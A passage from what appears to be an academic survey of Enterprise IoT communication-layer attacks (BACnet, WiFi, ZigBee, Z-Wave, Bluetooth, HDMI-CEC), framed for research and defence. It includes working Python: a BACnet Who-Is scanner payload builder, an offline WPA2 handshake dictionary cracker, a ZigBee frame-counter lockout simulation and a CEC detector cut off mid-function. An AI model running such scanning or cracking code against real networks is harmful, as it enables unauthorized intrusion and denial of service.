Similarly, vendors such as Control4, LiteTouch, and Savant use proprietary serial-based protocols to communicate with interfaces [252]–[254]. These connections are usually daisy-chained together and work with multiple lines. In addition to these examples, many product vendors manufacture devices with native serial communication, so that many devices and systems are integrated into E-IoT through serial links. For instance, advanced audio receivers, televisions, and alarm systems can all be integrated into E-IoT using serial communication [44], [227], [255], [256]. The technical specifications of many of these serial-based communication protocols are not publicly available, and thus any security mechanisms they may have remain largely unknown.

FOR EDUCATIONAL PURPOSES ONLY! Submitted to Elsevier AdHoc Networks. L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac

Building automation protocols such as BACnet also run over serial links. BACnet was designed specifically to meet the requirements of automation and control within corporate offices, buildings, and other commercial establishments. BACnet can be integrated into some E-IoT systems, with many compatible devices available, and is also used for communication in sensors, security systems, energy management, lighting control, physical access systems, and elevator controls [163]. BACnet implements four layers: an Application Layer, a Network Layer, a Data Link Layer, and a Physical Layer. Over serial media, RS-232 is used for point-to-point (PTP) communication while RS-485 carries the Master/Slave Token Passing (MS/TP) data link [257]; the same application and network layers also run over Ethernet and UDP/IP (BACnet/IP), which is the variant that ends up exposed on IP networks. Since BACnet is an open protocol, it has been adopted by various device vendors and manufacturers as a form of external control.
HDMI.
The High Definition Multimedia Interface (HDMI) is one of the core components of audio/video systems. It acts as the main physical connection between multiple devices (e.g., televisions, projectors, video players, receivers). As such, HDMI is one of the most common interfaces used worldwide, with billions of compatible devices in the wild [258]–[260]. By design, HDMI communication is not limited to audio and video: HDMI also carries control and information signals through the cabling and its 19-pin connector [261]. Further, HDMI can be part of distribution networks with switchers, splitters, and other interconnects that allow multiple HDMI-enabled devices to share A/V signals and communicate. As A/V distribution is an important part of E-IoT, HDMI plays a major role in E-IoT systems [262]–[264]. Some E-IoT systems use communication protocols embedded in HDMI to control and integrate devices into an E-IoT system [265]. For instance, the HDMI specification includes Consumer Electronics Control (CEC), which expands the functionality of HDMI systems [266]. CEC was developed to enable interoperability between HDMI devices. It is a low-bandwidth, single-wire bus protocol with 16 logical addresses (15 addressable devices plus a broadcast address). Some E-IoT systems use CEC to control A/V devices such as receivers, televisions, and projectors. Many vendors implement CEC features on their devices under different trade names, including Anynet+ (Samsung), Aquos Link (Sharp), BRAVIA Link/Sync (Sony), CEC (Hitachi), CE-Link and Regza Link (Toshiba), SimpLink (LG), VIERA Link (Panasonic), EasyLink (Philips), and Realink (Mitsubishi) [267].

TABLE V: Examples of E-IoT system proprietary RF protocols.

Vendor     Protocol                            Product Lines
Lutron     Clear Connect Technology RF [244]   Lighting, Shades, Interfaces
Somfy      Radio Technology Somfy [243]        Lighting, Shades, Interfaces
Leviton    LevNet RF [247]                     Lighting, Shades, Interfaces
Legrand    TopDog RF [246]                     Lighting, Shades, Interfaces
Crestron   infiNET EX/ER [245]                 HVAC, Lighting, Shades, Interfaces
B. Threat Model for E-IoT Communications Layer
In this layer, we consider Mallory compromising an E-IoT system through the communications layer, targeting the confidentiality, availability, and integrity of the system. Mallory thus compromises the E-IoT system through its communication components, often without the need for physical access. Attacks on this layer may exploit weak protocols, protocol vulnerabilities, implementation flaws, and similar factors. As such, Mallory is knowledgeable in communication vulnerabilities and has the equipment necessary to compromise E-IoT; for instance, Mallory may carry sniffers and the software needed to eavesdrop on communication channels and inject messages into E-IoT communication. We describe Mallory's possible roles in attacking the E-IoT communications layer as follows:
Visitors and Unprivileged Users.
Some users (e.g., visitors, insiders) may not have sufficient privileges to interact with all of the components of a deployed E-IoT system. Mallory, as a malicious unprivileged user, may use protocol vulnerabilities to gain unauthorized access to devices near her. As such, attacks on serial-based protocols, short-range wireless, and HDMI are feasible; an unprivileged user may need only preliminary knowledge of the protocols used.
IoT Hackers.
Malicious actors such as hackers may target E-IoT systems, specifically in public locations (e.g., presentation rooms, bars, campuses). In this scenario, Mallory, as a malicious hacker, may choose to perform reconnaissance of an E-IoT deployment without direct physical access to the system. More sophisticated attackers may additionally attempt to compromise a system, gain unauthorized access, cause Denial-of-Service conditions, or otherwise disrupt E-IoT operations through the communications layer. In this case, Mallory has no authorized access to any E-IoT system component.
C. Communication Layer: Attacks and Vulnerabilities
In this subsection, we give an overview of the attacks and vulnerabilities of the E-IoT Communications Layer. Specifically, we cover attacks on serial-based protocols, wireless protocols, HDMI-based protocols, and building automation protocols.
Serial-based Protocol Attacks.
One of the challenges of properly evaluating serial-based protocols in E-IoT is the proprietary nature of many of these protocols. Many proprietary protocols are long-lived and do not advertise any form of security mechanism for the communication. Information on many of these protocols (e.g., Cresnet) is sparse. These protocols rely largely on security through obscurity, as many of them were designed with functionality but not security in mind. Even with this lack of research, online communities and integrators have explored E-IoT protocols and managed to create sniffers that capture serial-based communication for debugging [158]. Such sniffers work without any form of authorization beyond physical access to the bus, which exposes E-IoT serial-based protocols to eavesdropping by anyone who can reach the wiring. One can draw parallels to industrial control protocols; a comprehensive review of security in industrial protocols can be found in a study by Volkova et al. [160]. This study highlighted that aging serial-based communication technologies such as Modbus can be attacked (e.g., credential theft, replay attacks, man-in-the-middle attacks) by a knowledgeable attacker.

An analysis in 2003 by the Department of Commerce found several threats to building automation protocols such as BACnet. While most systems were not connected to the Internet, there was still backdoor access via modem connections to controllers [161]. The study also noted various attacks on passwords, confidentiality, integrity, and availability (Denial of Service), as well as spoofing and eavesdropping within a BACnet installation. Gasser et al. studied Internet-exposed BACnet systems [162]. BACnet is often an integral part of connected Industrial Control Systems (ICS), which are critical infrastructure for businesses and offices of any size [268]. BACnet/IP operates on UDP ports 47808–47823 by default, 47808 (0xBAC0) being the standard port [163].
The researchers used a pre-made BACnet payload in conjunction with ZMap [269] to scan the IPv4 address space for valid responses. Using this methodology, they confirmed a total of 15,429 exposed BACnet devices on the Internet. A notable characteristic of BACnet/IP over UDP is that it is stateless and requires neither a handshake nor authentication. These characteristics make it susceptible to amplification attacks, a form of Denial-of-Service attack in which a request with a spoofed source address elicits a response payload larger than the request, so the victim receives more traffic than the attacker sent [162].
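As an added example (not the scanner or payload used by Gasser et al.), the following Python builds the broadcast Who-Is request that BACnet/IP devices answer with I-Am, parses such a reply, and computes the amplification ratio described above. The I-Am datagram is constructed (device instance 1234, vendor id 15); the code never opens a socket, and sending Who-Is to networks you are not authorized to test is not appropriate.

```python
"""BACnet/IP Who-Is / I-Am: build the discovery request, parse the reply, measure amplification.
Added example with a constructed I-Am datagram; not the payload used in the cited scan."""
import struct

BVLC_TYPE_BACNET_IP = 0x81
BVLC_ORIGINAL_UNICAST = 0x0A
BVLC_ORIGINAL_BROADCAST = 0x0B
BVLC_FORWARDED = 0x04            # carries a 6-byte originating B/IP address after the header
PDU_UNCONFIRMED_REQUEST = 0x1
SERVICE_I_AM = 0x00
SERVICE_WHO_IS = 0x08
OBJECT_TYPE_DEVICE = 8
BACNET_PORT = 47808              # 0xBAC0, the default BACnet/IP UDP port


def _unsigned(value):
    # shortest big-endian encoding (1-4 bytes) of a BACnet Unsigned
    return value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")


def build_who_is(low=None, high=None):
    """Global-broadcast Who-Is, optionally limited to a device instance range (context tags 0 and 1)."""
    apdu = bytes([PDU_UNCONFIRMED_REQUEST << 4, SERVICE_WHO_IS])
    if low is not None and high is not None:
        for tag, value in ((0, low), (1, high)):
            enc = _unsigned(value)
            apdu += bytes([(tag << 4) | 0x08 | len(enc)]) + enc   # context tag: class bit set
    npdu = b"\x01\x20\xff\xff\x00\xff"   # version 1, DNET 0xFFFF (global broadcast), DLEN 0, hop count 255
    length = 4 + len(npdu) + len(apdu)   # BVLC length covers the whole datagram
    return bytes([BVLC_TYPE_BACNET_IP, BVLC_ORIGINAL_BROADCAST]) + struct.pack(">H", length) + npdu + apdu


def _skip_npdu(buf, off):
    if buf[off] != 0x01:
        raise ValueError("unsupported NPDU version")
    control = buf[off + 1]
    off += 2
    if control & 0x20:                   # DNET(2) DLEN(1) DADR(DLEN)
        off += 3 + buf[off + 2]
    if control & 0x08:                   # SNET(2) SLEN(1) SADR(SLEN)
        off += 3 + buf[off + 2]
    if control & 0x20:                   # hop count follows when a destination is present
        off += 1
    return off


def _app_tag(buf, off):
    # application tag: number in the high nibble, class bit clear, length in the low 3 bits (5 = next byte)
    if buf[off] & 0x08:
        raise ValueError("context tag where an application tag was expected")
    tag_number, length = buf[off] >> 4, buf[off] & 0x07
    off += 1
    if length == 5:                      # extended length; only the one-byte form is handled here
        length = buf[off]
        off += 1
    return tag_number, buf[off:off + length], off + length


def parse_i_am(datagram):
    """Return the I-Am fields, or None if the datagram is not a well-formed I-Am."""
    try:
        if datagram[0] != BVLC_TYPE_BACNET_IP or datagram[1] not in (
                BVLC_ORIGINAL_UNICAST, BVLC_ORIGINAL_BROADCAST, BVLC_FORWARDED):
            return None
        if struct.unpack(">H", datagram[2:4])[0] != len(datagram):
            return None                  # truncated or padded datagram
        off = _skip_npdu(datagram, 10 if datagram[1] == BVLC_FORWARDED else 4)
        if datagram[off] >> 4 != PDU_UNCONFIRMED_REQUEST or datagram[off + 1] != SERVICE_I_AM:
            return None
        off += 2
        tag, obj, off = _app_tag(datagram, off)          # BACnetObjectIdentifier (tag 12, 4 bytes)
        if tag != 12 or len(obj) != 4:
            return None
        ident = struct.unpack(">I", obj)[0]              # 10-bit object type | 22-bit instance
        tag1, max_apdu, off = _app_tag(datagram, off)    # Unsigned
        tag2, seg, off = _app_tag(datagram, off)         # Enumerated
        tag3, vendor, off = _app_tag(datagram, off)      # Unsigned
        if (tag1, tag2, tag3) != (2, 9, 2):
            return None
        return {"object_type": ident >> 22, "device_instance": ident & 0x3FFFFF,
                "max_apdu": int.from_bytes(max_apdu, "big"),
                "segmentation": int.from_bytes(seg, "big"),
                "vendor_id": int.from_bytes(vendor, "big")}
    except (IndexError, ValueError, struct.error):
        return None


def amplification_factor(request, response):
    return len(response) / len(request)


# Constructed I-Am broadcast: device 1234, max APDU 1476, no segmentation, vendor id 15
SAMPLE_I_AM = bytes.fromhex("810b00180120ffff00ff1000c4020004d22205c49103210f")

if __name__ == "__main__":
    req = build_who_is()
    print(req.hex(), parse_i_am(SAMPLE_I_AM), amplification_factor(req, SAMPLE_I_AM))
```

Real devices answer a Who-Is with a broadcast I-Am, so on a shared segment a single 12-byte request from a spoofed source address elicits one larger reply per device; the length check in `parse_i_am` is what keeps a scanner from mis-parsing truncated or padded replies.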
WiFi Attacks.
WiFi communication has been an active topic of research due to its broad appeal and use in many connected devices. A myriad of WiFi attacks have been covered in different publications, surveys, and technical documents. Additionally, attacks may depend on the installed hardware, firmware, security mechanism in use (e.g., WEP, WPA, WPA2, WPA3), and the specific implementation. A survey by Lashkari et al. highlighted weaknesses in WiFi security mechanisms [165]. Specifically, this work notes that WEP is susceptible to attacks (e.g., packet forgery, replay attacks, de-authentication) and to vulnerabilities such as improper key management and weaknesses in the RC4 stream cipher. Other work by Borisov et al. goes further into the insecurity of WEP and how poor design choices (e.g., keystream reuse, key management) allow an attacker to compromise WEP-protected WiFi [164]. Specifically, WEP is vulnerable to eavesdropping, message modification, message injection, message decryption, authentication spoofing, and reaction attacks. While considered more secure, WPA also has vulnerabilities. Lashkari et al. note that WPA/WPA2 offers definite security improvements over WEP, such as the Temporal Key Integrity Protocol (TKIP) in WPA and the Advanced Encryption Standard (AES, in CCMP) in WPA2 [165]. However, even with these improvements, WPA and WPA2 can be susceptible to brute-force and dictionary attacks. A related attack on WPA/WPA2-Personal is handshake capture: an attacker captures the four-way handshake between a client and the access point and then performs offline brute-force or dictionary attacks against the captured handshake, which succeed whenever the pre-shared passphrase is weak [168]. An attack proposed by Vanhoef et al.
introduces key reinstallation attacks (KRACK) against WPA/WPA2, where an attacker can force a WiFi client to reinstall an already-in-use key and thereby reuse nonces, compromising confidentiality in the network [169]. Key reinstallation would allow Mallory to perform actions such as packet replay, decryption, and forgery in some implementations, severely impacting the confidentiality and integrity of WiFi communications. Other attacks such as Reaver and Pixie-Dust also target WPA-based security, specifically by exploiting the WiFi Protected Setup (WPS) protocol in routers [170]. Finally, weaknesses have also been found in the newer WPA3 mechanism: denial-of-service attacks, connection deprivation attacks, and handshake attacks can compromise WiFi communication with WPA3 security [171]–[174]. As many E-IoT devices use WiFi, any WiFi attack could compromise the confidentiality, integrity, and availability of E-IoT and E-IoT-integrated components.
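To make the handshake capture attack concrete, the following Python is an added example (not code from the cited works): it implements the WPA2-Personal key derivation (PBKDF2 from passphrase to PMK, the 802.11 PRF to PTK, and the HMAC-SHA1 MIC over EAPOL-Key message 2) and runs an offline dictionary check against a constructed handshake. The SSID, passphrase, MAC addresses, nonces, and RSN information element are made-up values. The same functions show why passphrase strength is the mitigation: each guess costs one PBKDF2 evaluation and needs nothing further from the network.

```python
"""WPA2-Personal handshake: key derivation and an offline dictionary check (added, constructed example)."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    # IEEE 802.11 PSK mapping: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit PMK
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    # 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) concatenated for i = 0, 1, ...
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    # PTK = PRF-384(PMK, "Pairwise key expansion", Min(AA,SPA) || Max(AA,SPA) || Min(nonces) || Max(nonces))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)   # KCK(16) | KEK(16) | TK(16) for CCMP


def build_msg2(snonce, key_data, mic=b"\x00" * 16):
    # EAPOL v2, type 3 (EAPOL-Key), RSN descriptor (2), Key Info 0x010a = MIC | Pairwise | HMAC-SHA1 version
    body = (b"\x02" + struct.pack(">HHQ", 0x010A, 0, 1)           # descriptor, key info, key length, replay ctr
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # nonce, key IV, key RSC, reserved key ID
            + mic + struct.pack(">H", len(key_data)) + key_data)   # MIC, key data length, key data (RSN IE)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def eapol_mic(kck, eapol_frame):
    # WPA2 MIC: HMAC-SHA1 over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed, truncated to 128 bits
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_frame, candidates):
    """Offline check: the captured MIC is the oracle; each candidate costs one PBKDF2 and one PRF."""
    captured_mic = eapol_frame[81:97]
    for passphrase in candidates:
        ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_frame), captured_mic):
            return passphrase
    return None


# Constructed handshake material (not a real capture)
SSID, PASSPHRASE = "E-IoT-Office", "conference2021"
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # AP and client MAC addresses
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP pairwise, PSK AKM


def captured_handshake():
    # What a sniffer sees in message 2: the client's MIC, computed from the real passphrase
    ptk = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    unsigned = build_msg2(SNONCE, RSN_IE)
    return build_msg2(SNONCE, RSN_IE, eapol_mic(ptk[:16], unsigned))


if __name__ == "__main__":
    frame = captured_handshake()
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, frame, ["password", "12345678", "conference2021"]))
```

The attacker only needs the two MAC addresses, both nonces, and one MIC-bearing EAPOL-Key frame, all of which are transmitted in the clear; a de-authentication frame is the usual way to force a client to produce a fresh handshake on demand.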
ZigBee and Z-Wave Attacks.
Wireless technologies are common in E-IoT systems across many different use cases and have been an active topic of research in the security community. As described in [180], various communication protocols (e.g., ZigBee, Z-Wave) can be attacked, negatively impacting E-IoT systems by directly affecting user interfaces. There have been known security breaches of ZigBee devices. The ZigBee Light Link (ZLL) standard was designed with easy client integration and installation in mind [181]. One known breach in 2015 involved the leakage of the master key for light-based ZigBee devices, which rendered ZLL devices insecure [182]. It must be noted that there are variations between ZigBee systems, software, hardware, and chipsets; not all attacks are effective on all ZigBee systems, even though the ZigBee stack is an accepted standard.

Energy depletion attacks such as Ghost-in-ZigBee [183] may prove effective against battery-powered E-IoT components. In addition to depleting ZigBee devices' power, they can facilitate threats such as DoS and replay attacks on a ZigBee network. The attack method involves sending false messages to nodes within a ZigBee network to trigger processor-intensive computations (e.g., cryptographic operations); the damage of these unnecessary computations on the affected device is both power- and performance-related. Ghost-in-ZigBee also demonstrates three types of DoS attacks. The first is a computational load attack, which sends numerous messages at the same time to deplete a node's energy; however, such an attack could easily be detected with anomaly detection. The second is MAC misbehavior, which takes advantage of ZigBee's channel sensing: when a targeted node receives continuous traffic, no node in that region can communicate through it. The third is a frame-counter replay attack, in which the attacker sends messages carrying frame counters greater than the valid values.
Since ZigBee keeps an Access Control List (ACL) table that records the last frame counter seen from each node, this table will be updated to match the malicious counter values. Any legitimate node trying to make contact after the alteration will be rejected because its frame counter values are less than the altered values, which amounts to a spoofing-based lockout. The article [180] mentions a third class of ZigBee attacks stemming from hardware implementations. Going further in depth, in [184] researchers attacked an implementation of an Atmel chip used in Philips Hue bulbs in ZigBee Light Link (ZLL) mode. In this attack, the researchers created a custom circuit board to target the ZigBee chipset used in the smart bulbs and created a worm that spread the infection among light nodes.

In [185], three types of attacks on ZigBee were demonstrated using the KillerBee toolkit [186]. The first attack takes advantage of ZigBee's discovery process and mimics a legitimate device to gather information about other devices within the ZigBee network; this scan spans multiple channels and yields responses from ZigBee nodes within each channel. The second attack is packet interception, which relies on some ZigBee networks using weak or no encryption; an attacker can eavesdrop on communication using the toolkit and a USB adapter to capture traffic on a given channel. As the third attack, if the previous two attacks are successful, an attacker can intercept and record ZigBee traffic and then replay previously recorded packets, and have ZigBee devices accept the replayed messages. Z-Wave vulnerabilities may depend on implementation practices, firmware, and hardware. Using reverse engineering methods, Fouladi et al. in [187] provided examples of available exploits that could compromise entire devices.
The attack used Z-Force, a packet interception and injection tool, to reset the established network key, taking advantage of the protocol's key-exchange steps. The researchers describe the issue as a lack of 'state validation' in some Z-Wave devices: an attacker can use packet injection to force a Z-Wave device to overwrite its current shared network key with an attacker-specified key. They demonstrated a successful attack on a connected door lock. While follow-up publications note that some of the attacks described have been patched, devices that have not been updated and that run older firmware may still be vulnerable [180].

The research by Fuller et al. explored vulnerabilities to rogue controllers within range of established Z-Wave networks [188]. This work introduced an attack that used a malicious Z-Wave controller to attack devices. To begin, the researchers established a Home Automation Network (HAN) using Z-Wave devices such as connected door locks, smart lights, and connected water valves. The attacker must first gain access to the local WLAN to perform this attack, assuming the network is improperly secured. Once on the network, an attacker can scan it and retrieve the address of the Z-Wave gateway and any other gateways. The researchers then took advantage of known gateway vulnerabilities and, in this case, attacked a VeraEdge Z-Wave controller. They retrieved and saved a backup file for the entire system. With this information, the researchers could duplicate a legitimate Z-Wave controller with a malicious one in the same network. This rogue controller could then communicate with Z-Wave devices within that network, compromising all of the available devices. The researchers also noted that, with this backup file, sensitive information and activity can potentially be retrieved, and that log files could prove valuable to an attacker gathering information for future attacks.
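The ZigBee frame-counter lockout described above comes down to one ordering decision in the receiver. The following Python is an added example, not a ZigBee stack or code from the cited works: it models a receiver that keeps a per-node last-counter table (the ACL table in the text) and a link-keyed message integrity code, with HMAC-SHA256 standing in for ZigBee's AES-CCM* MIC (an assumption made so the example runs with the standard library only). Node addresses, the key, and payloads are constructed. With the counter recorded before authentication, an unauthenticated frame carrying a high counter locks the legitimate node out; with the counter recorded only after MIC verification, the injected frame is dropped with no side effects.

```python
"""Frame-counter handling in a ZigBee-style receiver: counter update before vs. after authentication.
Added, constructed example; HMAC-SHA256 stands in for the AES-CCM* MIC of the real security suite."""
import hashlib
import hmac
import struct

MAX_COUNTER = 0xFFFFFFFF


def mic(key, src, counter, payload):
    # stand-in for a 32-bit CCM* MIC: first 4 bytes of HMAC-SHA256 over src || counter || payload
    return hmac.new(key, struct.pack(">QI", src, counter) + payload, hashlib.sha256).digest()[:4]


def make_frame(key, src, counter, payload):
    # a legitimate node builds the frame with its link key
    return {"src": src, "counter": counter, "payload": payload, "mic": mic(key, src, counter, payload)}


class Receiver:
    def __init__(self, link_keys, counter_update_before_auth):
        self.link_keys = link_keys       # src address -> link key (the key table)
        self.last_counter = {}           # src address -> highest frame counter accepted (the ACL table)
        self.before_auth = counter_update_before_auth

    def accept(self, frame):
        src, ctr = frame["src"], frame["counter"]
        last = self.last_counter.get(src, -1)
        if ctr <= last:
            return "rejected: replay (counter %d <= %d)" % (ctr, last)
        if self.before_auth:
            self.last_counter[src] = ctr         # the defect: trust the counter before checking the MIC
        key = self.link_keys.get(src)
        if key is None or not hmac.compare_digest(mic(key, src, ctr, frame["payload"]), frame["mic"]):
            return "rejected: bad MIC"
        self.last_counter[src] = ctr             # correct place: advance the counter only after authentication
        return "accepted"


def lockout_scenario(counter_update_before_auth):
    """Legitimate frame, then an injected high-counter frame without the key, then the next legitimate frame."""
    key, node = b"\x01" * 16, 0x0013A200          # constructed link key and node address
    rx = Receiver({node: key}, counter_update_before_auth)
    results = [rx.accept(make_frame(key, node, 41, b"toggle"))]
    injected = {"src": node, "counter": MAX_COUNTER - 1, "payload": b"x", "mic": b"\x00" * 4}
    results.append(rx.accept(injected))          # attacker has no key, so the MIC cannot verify
    results.append(rx.accept(make_frame(key, node, 42, b"toggle")))
    return results


if __name__ == "__main__":
    print("counter updated before auth:", lockout_scenario(True))
    print("counter updated after auth: ", lockout_scenario(False))
```

The injected frame is rejected in both configurations; the difference is whether its rejection leaves state behind. Once the stored counter has jumped to near its maximum, every genuine frame from that node is classified as a replay until the key table is reset, which is the availability impact the text describes.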
Bluetooth Attacks.
Another popular short-range wireless solution is Bluetooth. As mentioned earlier, Bluetooth is used by some E-IoT systems during standard operation and device configuration. Because of mobile devices, IoT, and other common uses of Bluetooth, attacks on Bluetooth have been widely documented, with a number of surveys written on the topic of Bluetooth security [190]–[194]. Relevant to E-IoT, attacks highlighted in these surveys include man-in-the-middle attacks that compromise Bluetooth's Secure Simple Pairing (SSP) to impersonate trusted parties [195]–[200]. Another attack relevant to E-IoT is Bluesniping, which uses specialized antennas to sniff Bluetooth communication well beyond the expected Bluetooth range [201]. Bluesniffing attacks may also be a concern, as attackers may be able to infer E-IoT activity from sniffing packets coming from Bluetooth-based interfaces and devices [202]. Disruption attacks such as Bluechopping, Bluecutting, and Bluedepriving may also affect the availability of E-IoT devices, as these attacks all disrupt Bluetooth communication through different approaches [176]. In Bluechopping, an attacker spoofs the identity of a connected Bluetooth device to cause a DoS condition. Bluecutting disrupts Bluetooth communication by spoofing a Bluetooth device and requesting that the target device begin re-pairing; the target then discards the stored link key, and pairing cannot be completed [203]. Finally, Bluedepriving interrupts Bluetooth communication by causing a conflict between a spoofed device and a legitimate device so that the legitimate device cannot pair over Bluetooth [204]. It must be noted that, similar to other protocols, many Bluetooth attacks depend on implementations, software versions, and use cases of Bluetooth devices.
IR Attacks.
IR communication is used in E-IoT in the form of IR flashers (emitters) to control integrated devices (e.g., displays, projectors, blinds). Most of these devices use simple line-of-sight receivers without any form of authentication of the remote. Many of the control codes are available from online sources such as Remote Central [270]. As such, it is trivial for an attacker to capture or emit IR commands through line of sight [205]. A malicious attacker could simply use an IR blaster to control IR-enabled devices and disrupt the operation of E-IoT systems [206]. In other cases, attackers may be able to reconfigure IR-enabled devices as if they had the original device remote. In terms of E-IoT, if a device is reconfigured or reset, an E-IoT system may no longer be able to communicate with it.
General Wireless Attacks.
In this category, we cover attacks that apply to wireless communication in the Industrial, Scientific, and Medical (ISM) frequency bands and are not unique to any communication protocol. Jamming attacks can negatively impact E-IoT communication in multiple modes and are a specialized form of Denial-of-Service attack. Specifically, jamming presents a major threat to wireless networks and to any E-IoT device that uses them (e.g., interfaces, sensors, relays), causing the devices to fall offline. Several works and surveys have covered jamming attacks against wireless communication that are relevant to E-IoT systems [207]–[210]. These surveys highlight several proven jamming techniques against wireless networks (e.g., spot jamming, sweep jamming, barrage jamming, deceptive jamming). Further, jamming attacks are often cheap, easy to perform, and difficult to mitigate. The capabilities of more elaborate jamming attacks such as reactive jamming are covered by Wilhelm et al., who highlight the dangers of reactive jamming in wireless networks, where the jammer targets specific packets in wireless communication [211]. While reactive jamming may be limited by cost, demonstrations show that an attacker can target specific wireless communication (e.g., ZigBee) with some technical knowledge and widely available low-cost devices [212].
HDMI-Based Protocol Attacks.
HDMI is one of the core connections of video distribution and contains various sub-protocols that can pose a threat to E-IoT systems. In HDMI-Walk, Puche et al. demonstrated that the CEC protocol can be used to gain arbitrary control of CEC-supported device functions [217]. Specifically, the authors showed that CEC can be used across HDMI distributions to attack multiple HDMI devices. The HDMI-Walk attacks further showed that an attacker can control devices, transfer information, cause DoS conditions, eavesdrop, and otherwise harm HDMI networks through a single point of connection or a single compromised device. For all of the attacks, the researchers inserted a device into an HDMI distribution. The first attack used the inserted device to gather information about all of the connected HDMI devices, returning details such as language, model number, power state, and running version. Two more attacks showed that eavesdropping and facilitation of existing attacks are possible with CEC: the authors used CEC for unauthorized data transfer, moving audio information and captured WPA handshakes from one end of the distribution to a rogue device at the other end. Finally, two DoS attacks were demonstrated in HDMI-Walk. In the first, the attacker device was configured to identify televisions powering on through CEC broadcasts and to shut the displays down before they finished initializing. The second DoS attack abused television input changes and overwhelmed displays through CEC, causing them to become inoperable. Further, the authors of HDMI-Walk noted that CEC propagation is not obvious and is difficult to mitigate, creating networks without the user's awareness.
Other relevant work on HDMI sub-protocols was published by the NCC Group, which identified CEC fuzzing vulnerabilities and other viable threats through HDMI [218]. Specifically, NCC Group identified that the HDMI Ethernet Channel (HEC) could be used for corporate boundary breach, endpoint protection circumvention, and unauthorized network extension. Similar work by Smith et al. contributed further CEC-based fuzzing with the development of the tool CEC-STeR, used to execute fuzzing attacks against CEC-supported devices [219], [220].
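The two HDMI-Walk behaviours described above (device enumeration and the power-on shutdown DoS) are visible on the CEC bus itself, and the passive detection approach discussed under the mitigations later in this section relies on exactly that. The following Python is an added example, not code from HDMI-Walk, its authors, or the NCC Group work: it decodes cec-client-style frame strings (header byte with initiator and destination nibbles, then opcode and operands, in hex) and runs two detection rules over a constructed trace. Logical addresses and opcodes follow the CEC specification; the trace, thresholds, and rule names are assumptions for illustration.

```python
"""Decode CEC frames and flag two HDMI-Walk-style patterns. Added example with a constructed trace."""
from collections import defaultdict

# Logical addresses and opcodes per the HDMI-CEC specification
LOGICAL_ADDRESSES = {0: "TV", 1: "Recording1", 2: "Recording2", 3: "Tuner1", 4: "Playback1",
                     5: "AudioSystem", 6: "Tuner2", 7: "Tuner3", 8: "Playback2", 9: "Recording3",
                     10: "Tuner4", 11: "Playback3", 14: "FreeUse", 15: "Broadcast/Unregistered"}
OPCODES = {0x04: "ImageViewOn", 0x0D: "TextViewOn", 0x36: "Standby", 0x46: "GiveOSDName",
           0x47: "SetOSDName", 0x82: "ActiveSource", 0x83: "GivePhysicalAddress",
           0x84: "ReportPhysicalAddress", 0x85: "RequestActiveSource", 0x86: "SetStreamPath",
           0x87: "DeviceVendorID", 0x8C: "GiveDeviceVendorID", 0x8F: "GiveDevicePowerStatus",
           0x90: "ReportPowerStatus", 0x9E: "CECVersion", 0x9F: "GetCECVersion"}
QUERY_OPCODES = {0x46, 0x83, 0x8C, 0x8F, 0x9F}   # "give me information" requests used for enumeration
STANDBY_TO_ON = 2                                 # ReportPowerStatus operand: transitioning standby -> on


def decode_frame(hex_frame):
    """hex_frame is cec-client style 'header:opcode:operands', e.g. '40:36' = Playback1 -> TV Standby."""
    blocks = bytes(int(b, 16) for b in hex_frame.split(":"))
    frame = {"initiator": blocks[0] >> 4, "destination": blocks[0] & 0x0F, "opcode": None, "name": "Polling"}
    if len(blocks) == 1:
        return frame                              # a polling message is just the header block
    opcode, ops = blocks[1], blocks[2:]
    frame.update(opcode=opcode, name=OPCODES.get(opcode, "Opcode0x%02X" % opcode))
    if opcode in (0x82, 0x84, 0x86) and len(ops) >= 2:
        frame["physical_address"] = "%d.%d.%d.%d" % (ops[0] >> 4, ops[0] & 0xF, ops[1] >> 4, ops[1] & 0xF)
        if opcode == 0x84 and len(ops) >= 3:
            frame["device_type"] = ops[2]
    elif opcode == 0x47:
        frame["osd_name"] = ops.decode("ascii", errors="replace")
    elif opcode == 0x90 and ops:
        frame["power_status"] = ops[0]
    elif opcode == 0x87 and len(ops) >= 3:
        frame["vendor_id"] = ops[:3].hex()
    return frame


def detect(trace, recon_window_ms=1000, recon_threshold=6, kill_window_ms=500, kill_threshold=2):
    """trace: list of (timestamp_ms, hex_frame). Returns a list of alert dicts (thresholds are assumptions)."""
    frames = [(t, decode_frame(f)) for t, f in trace]
    alerts = []
    # Rule 1: one initiator querying many distinct (destination, opcode) pairs inside a short window
    per_initiator = defaultdict(list)
    for t, f in frames:
        if f["opcode"] in QUERY_OPCODES:
            per_initiator[f["initiator"]].append((t, f["destination"], f["opcode"]))
    for init, events in per_initiator.items():
        for i, (t0, _, _) in enumerate(events):
            window = {(d, o) for t, d, o in events[i:] if t - t0 <= recon_window_ms}
            if len(window) >= recon_threshold:
                alerts.append({"rule": "cec_recon", "initiator": init, "queries": len(window), "at_ms": t0})
                break
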